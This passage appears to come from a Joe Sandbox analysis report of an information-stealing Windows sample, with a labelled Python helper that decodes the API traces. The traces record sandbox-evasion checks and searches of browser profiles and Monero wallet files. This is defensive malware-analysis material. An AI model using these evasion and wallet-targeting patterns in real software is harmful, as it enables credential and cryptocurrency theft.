                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: a0a19a80e2c520b547313a1974e52b5ffb98d559608b474e7b96f9c7c82a13b0
                              • Instruction ID: 86f7068667c8598e858177bf070a893a74939b6e35ced37968ed7f05ff13b595
                              • Opcode Fuzzy Hash: a0a19a80e2c520b547313a1974e52b5ffb98d559608b474e7b96f9c7c82a13b0
                              • Instruction Fuzzy Hash: 6011F830900108ABCB19FB60D952FED7378AF70304F804158F80A4A592EF34EB05CA92
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 001C792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 18737637da67ad1624195fd3372e743f1c9f3f61ec17945d3b987c45ebd13fcf
                              • Instruction ID: 1d41544d068af844199f17cbd6e5f17bcfc9591f7d1bdd872a7251f069e38635
                              • Opcode Fuzzy Hash: 18737637da67ad1624195fd3372e743f1c9f3f61ec17945d3b987c45ebd13fcf
                              • Instruction Fuzzy Hash: 310162B1904604EFC704DF94DD45FAABBBCF704B65F10421AE545A3280C3B49900CBA2
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001B112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 001B1132
                              • ExitProcess.KERNEL32 ref: 001B1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 1e8285f301004f9a7b0c986b8cbfc25b6162d5193202ab22beb4e989b5c0d220
                              • Instruction ID: 75edb6e8398d8d1c86a7c84de6de9271082444b8f7c4858252be2ff6a74300ba
                              • Opcode Fuzzy Hash: 1e8285f301004f9a7b0c986b8cbfc25b6162d5193202ab22beb4e989b5c0d220
                              • Instruction Fuzzy Hash: 70E08CB0A85308FBE710ABA0DC0AB587ABCAB04B42F500044F70CBA1C0C7F42A00DA9A
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001B10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001B10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 1934e8898fba9cf009023f80155ecb53fc96e08a3e1d5dcaa1038b5d274d1535
                              • Instruction ID: 75d32ffe8038d3373813f5448de90ad504deee5f9735d6bc82e0479dfdb0aca8
                              • Opcode Fuzzy Hash: 1934e8898fba9cf009023f80155ecb53fc96e08a3e1d5dcaa1038b5d274d1535
                              • Instruction Fuzzy Hash: 01F0E2B1641308BBE714AAA4AC59FBAB7ECE705B15F300448F508E3280D672AE00CAA0
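                              Added example (not Joe Sandbox output and not code from the sample): a small Python helper that parses "APIs" records in the form shown in the function blocks above, decodes the raw stack words of the calls listed in the GlobalMemoryStatusEx, VirtualAllocExNuma, OpenEventA/CreateEventA/Sleep, VirtualAlloc and WinINet blocks against Windows SDK constants, and flags functions in which a host-property query reaches ExitProcess with nothing but CRT helpers in between. The input lines are copied from this report; the constant tables, the list of APIs treated as host queries, and the reading of the stack words printed on the GetCurrentProcess line as the pending VirtualAllocExNuma arguments are assumptions made here.

```python
"""Decode and triage 'APIs' lines from a Joe Sandbox function listing.  Added example, not
Joe Sandbox code.  REPORT is constructed from lines shown in this report; the constant tables
are assumptions taken from the Windows SDK headers (winnt.h, wininet.h)."""
import re

REPORT = """
GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001B123E
__aulldiv.LIBCMT ref: 001B1258
__aulldiv.LIBCMT ref: 001B1266
ExitProcess.KERNEL32 ref: 001B1294

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001B112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 001B1132
ExitProcess.KERNEL32 ref: 001B1143

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000), ref: 001C6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001C6AE8
Sleep.KERNEL32(00001770), ref: 001C6B04
ExitProcess.KERNEL32 ref: 001C6B22

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001B10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001B10F7

HttpOpenRequestA.WININET(00000000,GET,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001B63BF
"""
BLOCKS = [b.splitlines() for b in REPORT.strip().split("\n\n")]  # one list per function block
LINE_RE = re.compile(r"^(?:•\s*)?(?:Part of subcall function [0-9A-F]+:\s*)?"
                     r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-F]+)$")
MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
PAGE = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
INET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
              0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
              0x00080000: "INTERNET_FLAG_NO_COOKIES", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
INET_OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
EVENT_ALL_ACCESS = 0x1F0003
# Assumption: APIs that read host properties; an ExitProcess straight after one is an environment gate.
ENV_QUERIES = {"GlobalMemoryStatusEx", "GetSystemInfo", "VirtualAllocExNuma", "GetUserNameA", "GetComputerNameA"}

def parse_block(lines):
    """-> list of (api, module, args, ref); hex stack words become ints, '?' and strings such as GET stay text."""
    calls = []
    for m in filter(None, (LINE_RE.match(ln.strip()) for ln in lines)):
        toks = [t.strip() for t in (m.group(3) or "").split(",") if t.strip()]
        args = [int(t, 16) if re.fullmatch(r"[0-9A-Fa-f]+", t) else t for t in toks]
        calls.append((m.group(1), m.group(2), args, m.group(4)))
    return calls

def bits(value, table):
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)  # bits not in the table are kept as a hex remainder
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"

def decode(api, a):
    """Readable form of the raw stack words for the APIs this report shows; '' if none known."""
    if api == "Sleep" and a:
        return f"{a[0]} ms"
    if api == "OpenEventA" and a:
        return "EVENT_ALL_ACCESS" if a[0] == EVENT_ALL_ACCESS else hex(a[0])
    if api == "VirtualAlloc" and len(a) >= 4:
        return f"size={a[1]} bytes ({a[1] / 2**20:.1f} MiB), {bits(a[2], MEM)}, {PAGE.get(a[3], hex(a[3]))}"
    if api == "VirtualFree" and len(a) >= 3:
        return f"size={a[1]} bytes, {bits(a[2], MEM)}"
    if api == "GetCurrentProcess" and len(a) == 5:
        # Assumption: the sandbox prints the stack at call time and GetCurrentProcess has no parameters, so
        # these are the already-pushed VirtualAllocExNuma arguments of the call that follows in the same function.
        return f"pending VirtualAllocExNuma: size={a[1]} bytes, {bits(a[2], MEM)}, {PAGE.get(a[3], hex(a[3]))}, NUMA node {a[4]}"
    if api == "HttpOpenRequestA" and len(a) >= 7:
        return f"verb={a[1]}, {bits(a[6], INET_FLAGS)}"
    if api == "InternetSetOptionA" and len(a) >= 2:
        return INET_OPTION.get(a[1], str(a[1]))
    return ""

def exit_gates(calls):
    """(query_api, exit_ref) pairs: an ENV_QUERIES call reaching ExitProcess with only CRT helpers between."""
    gates, pending = [], None
    for api, module, _, ref in calls:
        if api in ENV_QUERIES:
            pending = api
        elif api == "ExitProcess":
            if pending:
                gates.append((pending, ref))
            pending = None
        elif module != "LIBCMT":  # any other Win32 call breaks the query -> exit chain
            pending = None
    return gates

def triage(blocks):
    """Per block: first ref, decoded constants, environment gates, named-event polling delay in ms."""
    out = []
    for lines in blocks:
        calls = parse_block(lines)
        apis = {c[0] for c in calls}
        sleep = next((c[2][0] for c in calls if c[0] == "Sleep" and c[2]), None)
        out.append({"first_ref": calls[0][3] if calls else "?",
                    "decoded": [(c[0], decode(c[0], c[2])) for c in calls if decode(c[0], c[2])],
                    "exit_gates": exit_gates(calls),
                    "event_poll_ms": sleep if {"OpenEventA", "CreateEventA", "Sleep"} <= apis else None})
    return out

if __name__ == "__main__":
    print(*triage(BLOCKS), sep="\n")
```

                              Run on the lines above it reports two environment gates (GlobalMemoryStatusEx reaching ExitProcess at 001B1294, VirtualAllocExNuma reaching ExitProcess at 001B1143) and a 6000 ms polling delay in the OpenEventA/CreateEventA block, and it reads the raw words as: Sleep 0x1770 = 6000 ms; OpenEventA access 0x001F0003 = EVENT_ALL_ACCESS; VirtualAlloc size 0x17C841C0 = 399000000 bytes (380.5 MiB) with MEM_COMMIT|MEM_RESERVE and PAGE_READWRITE; VirtualFree with MEM_RELEASE; HttpOpenRequestA flags 0x00400100 = INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE; InternetSetOptionA option 0x1F = INTERNET_OPTION_SECURITY_FLAGS. The caveat is that an API listing only shows that the exit path exists after the query; the threshold the sample compares against (the __aulldiv quotient in function 001B1220) is not recoverable from these lines and needs the disassembly.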
                              APIs
                                • Part of subcall function 001C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7910
                                • Part of subcall function 001C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001C7917
                                • Part of subcall function 001C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001C792F
                                • Part of subcall function 001C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001B11B7), ref: 001C7880
                                • Part of subcall function 001C7850: RtlAllocateHeap.NTDLL(00000000), ref: 001C7887
                                • Part of subcall function 001C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001C789F
                              • ExitProcess.KERNEL32 ref: 001B11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 60f9e815a73071303e971ec1aef37124d07241475063e7c3d2cab9ad539929a2
                              • Instruction ID: 6c8932885bc3644c2d554d1253824a6e1c16262059f104b9dc01a152ccc64fa2
                              • Opcode Fuzzy Hash: 60f9e815a73071303e971ec1aef37124d07241475063e7c3d2cab9ad539929a2
                              • Instruction Fuzzy Hash: 72E012F591470163DA0073B5AC5AF3A329C5B34745F04082CFA0DD7142FB65F804C966
                              APIs
                              • wsprintfA.USER32 ref: 001C38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 001C38E3
                              • lstrcat.KERNEL32(?,?), ref: 001C3935
                              • StrCmpCA.SHLWAPI(?,001D0F70), ref: 001C3947
                              • StrCmpCA.SHLWAPI(?,001D0F74), ref: 001C395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001C3C67
                              • FindClose.KERNEL32(000000FF), ref: 001C3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 3d1e71b320d00a2194c7115195cd400e1f91545b0e2961e25fbc6e8ff4c21862
                              • Instruction ID: 0a253a50c1dbffd8551db87b4331b8c5751dbdff24ceb928cd0a15b3896927ca
                              • Opcode Fuzzy Hash: 3d1e71b320d00a2194c7115195cd400e1f91545b0e2961e25fbc6e8ff4c21862
                              • Instruction Fuzzy Hash: B0A12EB1A00218ABDB25EBA4DC85FFE737CBB98300F44858DE51D96141EB759B84CF62
                              APIs
                              • wsprintfA.USER32 ref: 001C492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 001C4943
                              • StrCmpCA.SHLWAPI(?,001D0FDC), ref: 001C4971
                              • StrCmpCA.SHLWAPI(?,001D0FE0), ref: 001C4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001C4B7D
                              • FindClose.KERNEL32(000000FF), ref: 001C4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*$8
                              • API String ID: 180737720-308424086
                              • Opcode ID: 3bf9e4bfd667d8e2afe8a14f41dcb58105d5d2142a447625b3c1104733fb4cd1
                              • Instruction ID: 55f2d787f77ae10d70d29b06f272570b1c94bb6cb026af8fc2b05d8e097589b5
                              • Opcode Fuzzy Hash: 3bf9e4bfd667d8e2afe8a14f41dcb58105d5d2142a447625b3c1104733fb4cd1
                              • Instruction Fuzzy Hash: CE6141B2900618ABCB25EBA0DC59FFA777CBB58701F04458CE50D96141EB71EB89CFA1
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,001D0B32,001D0B2B,00000000,?,?,?,001D13F4,001D0B2A), ref: 001BBEF5
                              • StrCmpCA.SHLWAPI(?,001D13F8), ref: 001BBF4D
                              • StrCmpCA.SHLWAPI(?,001D13FC), ref: 001BBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BC7BF
                              • FindClose.KERNEL32(000000FF), ref: 001BC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 32a07f08459d25d321fb854cd1b94c72496f3b0f95733fc5861b4ecc9ddabed7
                              • Instruction ID: 26e30c70c19e3f890d6b0b4692e593af8179f654434b7eef39baf69411738110
                              • Opcode Fuzzy Hash: 32a07f08459d25d321fb854cd1b94c72496f3b0f95733fc5861b4ecc9ddabed7
                              • Instruction Fuzzy Hash: 2B421072910108ABCB15FBA0DD96EED737DAF74304F80455CF50A96191EF34EA49CBA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001C4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C4587
                              • wsprintfA.USER32 ref: 001C45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 001C45BD
                              • StrCmpCA.SHLWAPI(?,001D0FC4), ref: 001C45EB
                              • StrCmpCA.SHLWAPI(?,001D0FC8), ref: 001C4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001C468B
                              • FindClose.KERNEL32(000000FF), ref: 001C46A0
                              • lstrcat.KERNEL32(?,00EEE438), ref: 001C46C5
                              • lstrcat.KERNEL32(?,00EED640), ref: 001C46D8
                              • lstrlen.KERNEL32(?), ref: 001C46E5
                              • lstrlen.KERNEL32(?), ref: 001C46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*$8
                              • API String ID: 671575355-2210567263
                              • Opcode ID: 949959c0512bb487512ac6cf426b5ff82c428823a85e3a99d17f9a8ee8fe359e
                              • Instruction ID: 11b0103d9217e59c698a822facb9a3ee602f11be85ddd99d099d41390ee0d831
                              • Opcode Fuzzy Hash: 949959c0512bb487512ac6cf426b5ff82c428823a85e3a99d17f9a8ee8fe359e
                              • Instruction Fuzzy Hash: FB5144B2540218ABC725EBB0DC99FF9777CAB68700F404588F60D96190EB75DB84CFA2
                              APIs
                              • wsprintfA.USER32 ref: 001C3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 001C3EDA
                              • StrCmpCA.SHLWAPI(?,001D0FAC), ref: 001C3F08
                              • StrCmpCA.SHLWAPI(?,001D0FB0), ref: 001C3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001C406C
                              • FindClose.KERNEL32(000000FF), ref: 001C4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$8
                              • API String ID: 180737720-3893450896
                              • Opcode ID: dc4c48b083d717f6f996fbd0cfc4a9761a6923be16b9ca9fca2b4d2dba0b6e2a
                              • Instruction ID: 0d3ac7b946bfaaca42c63d7ab5a53a10850950e810a6d9aca1a80b5107c3b576
                              • Opcode Fuzzy Hash: dc4c48b083d717f6f996fbd0cfc4a9761a6923be16b9ca9fca2b4d2dba0b6e2a
                              • Instruction Fuzzy Hash: DC5130B2900618ABCB25EBA0DC85FFA737CBB68300F40458CB65D96040DB75DB85CFA1
                              APIs
                              • wsprintfA.USER32 ref: 001BED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 001BED55
                              • StrCmpCA.SHLWAPI(?,001D1538), ref: 001BEDAB
                              • StrCmpCA.SHLWAPI(?,001D153C), ref: 001BEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BF2AE
                              • FindClose.KERNEL32(000000FF), ref: 001BF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 433e6ac9139e19aa528c09b12cc028784d1ca9ba36e8693b34f6e3fde3a09bfd
                              • Instruction ID: 63ce4d29cf81aca99e85008fcc2faf0f71e7f0dfaf67febb93e31f160df8a2cc
                              • Opcode Fuzzy Hash: 433e6ac9139e19aa528c09b12cc028784d1ca9ba36e8693b34f6e3fde3a09bfd
                              • Instruction Fuzzy Hash: EDE19A7191111CAADB56EB60DC52FEE7378AF74305F80459DB50A62092EF30AF8ACF52
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001D15B8,001D0D96), ref: 001BF71E
                              • StrCmpCA.SHLWAPI(?,001D15BC), ref: 001BF76F
                              • StrCmpCA.SHLWAPI(?,001D15C0), ref: 001BF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BFAB1
                              • FindClose.KERNEL32(000000FF), ref: 001BFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 0acf9501d0d8256988c86da1b8b5916ab2b0d66a1520ab5e5c6bf289b010d6b4
                              • Instruction ID: aed31aa6a699baaf7fef0eda5f33f944887c7251839b6222910d23a4d83c1c28
                              • Opcode Fuzzy Hash: 0acf9501d0d8256988c86da1b8b5916ab2b0d66a1520ab5e5c6bf289b010d6b4
                              • Instruction Fuzzy Hash: 62B112719002189BDB25FB60DC96FED7379AF74304F8085ADE40A97151EF31AB4ACB92
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001D510C,?,?,?,001D51B4,?,?,00000000,?,00000000), ref: 001B1923
                              • StrCmpCA.SHLWAPI(?,001D525C), ref: 001B1973
                              • StrCmpCA.SHLWAPI(?,001D5304), ref: 001B1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001B1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 001B1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001B1E20
                              • FindClose.KERNEL32(000000FF), ref: 001B1E32
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
